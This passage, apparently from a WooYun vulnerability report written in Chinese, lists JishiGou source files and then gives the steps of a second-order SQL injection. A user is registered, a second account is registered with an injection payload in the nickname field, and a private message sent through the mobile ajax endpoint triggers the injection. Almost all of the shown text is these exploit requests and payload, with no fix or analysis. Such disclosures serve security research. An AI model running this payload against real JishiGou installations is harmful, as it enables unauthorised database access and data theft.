modules/member.mod.php
include/class/passport.class.php
modules/ajax/pm.mod.php
include/logic/pm.logic.php 0x02
POST
email=www@wooyun.org&password=12345&password2=12345&nickname=woo
到
http://localhost/jishigou/index.php?mod=member&code=doregister
先注册一个woo用户,用于回显。
然后POST
email=Chora@wooyun.org&password=12345&password2=12345&nickname=woo')and/**/1=1/**/and('1
到
http://localhost/jishigou/index.php?mod=member&code=doregister
引入注入语句。
然后访问自己的主页,查看自己的UID。
最后POST
uid=你的UID&message=wooyun
到
http://localhost/jishigou/mobile/ajax.php?mod=pm&code=send
出发注入。